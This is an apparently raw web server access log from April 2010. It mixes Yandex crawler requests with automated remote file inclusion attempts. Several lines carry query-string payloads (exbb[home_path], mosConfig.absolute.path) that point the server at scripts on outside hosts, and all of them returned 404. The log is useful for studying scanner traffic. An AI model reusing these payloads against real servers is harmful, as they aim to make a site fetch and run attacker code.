87.250.255.243 - - [20/Apr/2010:15:31:45 -0500] "GET /logs/access_log.1184889600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
203.19.4.18 - - [20/Apr/2010:15:32:57 -0500] "GET /logs//modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.250.255.243 - - [20/Apr/2010:15:33:01 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
203.19.4.18 - - [20/Apr/2010:15:33:03 -0500] "GET //modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.250.255.243 - - [20/Apr/2010:15:35:34 -0500] "GET /logs/access_log.1158364800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:15:38:09 -0500] "GET /logs/access_log.1188172800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.236.43.200 - - [20/Apr/2010:15:38:51 -0500] "GET /logs/access_log.1220054400/index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.236.43.200 - - [20/Apr/2010:15:38:51 -0500] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.236.43.200 - - [20/Apr/2010:15:38:52 -0500] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [20/Apr/2010:15:40:42 -0500] "GET /logs/access_log.1216166400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
